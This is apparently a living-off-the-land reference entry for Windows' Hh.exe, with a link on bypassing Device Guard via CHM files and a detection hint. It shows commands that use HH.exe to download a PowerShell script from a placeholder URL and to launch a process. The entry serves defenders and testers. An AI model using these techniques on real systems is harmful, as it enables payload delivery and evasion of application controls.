.. / Hh.exe
Star

Binary used for processing chm files in Windows


Paths:


Resources:
https://oddvar.moe/2017/08/13/bypassing-device-guard-umci-using-chm-cve-2017-8625/

Acknowledgement:
Oddvar Moe - @oddvarmoe


Detection:
hh.exe should normally not be in use on a normal workstation



Download

Open the target PowerShell script with HTML Help.
HH.exe http://some.url/script.ps1
Usecase:Download files from url
Privileges required:User
OS:Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Mitre:T1105



Execute

Executes calc.exe with HTML Help.
HH.exe c:\windows\system32\calc.exe
Usecase:Execute process with HH.exe
Privileges required:User
OS:Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Mitre:T1216